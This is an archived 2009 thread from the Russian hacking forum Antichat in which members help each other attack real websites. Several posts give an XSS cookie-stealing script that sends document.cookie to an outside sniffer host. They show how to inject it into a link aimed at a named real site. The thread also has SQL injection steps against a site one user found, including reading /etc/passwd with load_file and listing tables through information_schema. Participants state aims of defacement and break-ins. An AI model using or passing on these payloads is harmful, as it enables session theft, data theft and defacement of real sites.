ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
06.04.2009, 17:10
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
Saiga, если пасивка, то кидаешь с линком что то типа:
<script>img = new Image();img.src = "http://sniffer.com/sniffer.gif?"+document.cookie;</script>
да в принципе если и активка, то этот вариант подойдёт 
цитата ниженаписанного:
как я понял из его вопроса он не может сформировать правильный линк...
...а вот kak подставить к ссылке никак не понимаю. сайт не хочу пока что давать.
без линка сложно будет помочь...
Иногда линк формируется примерно так:
http://site.com/blablabla.php"><script>img = new Image();img.src = "http://sniffer.com/sniffer.gif?"+document.cookie;</script>
Ну это лишь один из случаев...
Последний раз редактировалось -m0rgan-; 06.04.2009 в 17:40..
|
|
|
06.04.2009, 17:26
|
|
Познающий
Регистрация: 14.01.2009
Сообщений: 93
Провел на форуме:
244235
Репутация:
39
|
|
Сообщение от joks
я до этого тоже додумался, и спрашивал, потому что нету желания платить за 3-х значный домен, который мне больше не будет нужен. И сайт сам по себе того не стоит, мне чистый дефейс нужно сделать, пробил все сайты на хосте, ни одной потенциальной баги, все статичные htm мелких предприятий...
з.ы.
но тут появилась идея попробовать взломать какой-нибудь 2-х или 3-х значный домен =)
3 буквы ру стоят 1 бакс
http://www.drupal.ru/node/26048
|
|
|
|
06.04.2009, 17:28
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141
Репутация:
3099
|
|
Сообщение от -m0rgan-
Saiga, если пасивка, то кидаешь с линком что то типа:
<script>img = new Image();img.src = "http://sniffer.com/sniffer.gif?"+document.cookie;</script>
да в принципе если и активка, то этот вариант подойдёт как я понял из его вопроса он не может сформировать правильный линк... так что не надо меня пугать jokester"om  ми нисколько не боится.
PS jokester, ты всех тут запугал 
Последний раз редактировалось xcedz; 06.04.2009 в 17:31..
|
|
|
|
06.04.2009, 18:13
|
|
Познающий
Регистрация: 22.07.2008
Сообщений: 49
Провел на форуме:
170912
Репутация:
-4
|
|
http://www.toidutare.ee//retsept.php?otsi=1
<scr_ipt>im*g=new Image();im*g.src="http://sniffer.xaknet.ru/userbars/img_4_551.gi*f?"+document.cookie;</scri_pt>
что то такое ? но на сниффере , самого меня показывает ))
это пассивка , спс за помощь
Последний раз редактировалось Saiga; 06.04.2009 в 18:22..
|
|
|
|
06.04.2009, 18:15
|
|
Познающий
Регистрация: 05.04.2009
Сообщений: 71
Провел на форуме:
299541
Репутация:
5
|
|
Привет всем ребята помогите
Нашел сайтик что мне нужно! сделал sql-inj
Узнал
Версия версия СУБД (базы данных) - 5.0.45
пролистал все колонки но нигде не нашел упоминание о admin user
Что сделал не так кто поможет?
,load_file(0x2f6574632f706173737764)
load_file(/etc/passwd/)
И просмотрел все 115 полей посмотрел каждое поле думал что админ поменял название ничего нет! Что делать уже не знаю
|
|
|
|
06.04.2009, 18:22
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Значит не судьба, если нужен так именно этот сайт, попробуй поискать баги у "соседей".
|
|
|
|
06.04.2009, 18:23
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
Сообщение от Saiga
http://www.toidutare.ee//retsept.php?otsi=1
Сиега, пихаешь в уязвимое поле свой яваскрипт, например "><script>alert()</script> и смотри в адресную строку:
Код:
http://www.toidutare.ee//retsept.php?otsi=1&string=&string2=&string3=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&liik=
Этот линк и кидать, с другими даннымы разумеется...
|
|
|
|
06.04.2009, 18:25
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Сообщение от massovka
Привет всем ребята помогите
Нашел сайтик что мне нужно! сделал sql-inj
Узнал
Версия версия СУБД (базы данных) - 5.0.45
пролистал все колонки но нигде не нашел упоминание о admin user
Что сделал не так кто поможет?
,load_file(0x2f6574632f706173737764)
load_file(/etc/passwd/)
И просмотрел все 115 полей посмотрел каждое поле думал что админ поменял название ничего нет! Что делать уже не знаю
Прежде чем смотреть поля, надо узнать в каких таблицах ты эти поля смотришь:
union+select+table_name+from+information_schema.ta bles
|
|
|
|
06.04.2009, 18:31
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Сообщение от Pashkela
Прежде чем смотреть поля, надо узнать в каких таблицах ты эти поля смотришь:
union+select+table_name+from+information_schema.ta bles
Скорее всего он таблицы называет полями.
|
|
|
|
06.04.2009, 18:38
|
|
Познающий
Регистрация: 05.04.2009
Сообщений: 71
Провел на форуме:
299541
Репутация:
5
|
|
information_schema.tables вот тут смотрю все 115 полей посмотрел ничего нет ставил стандартные название ничего пусто
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
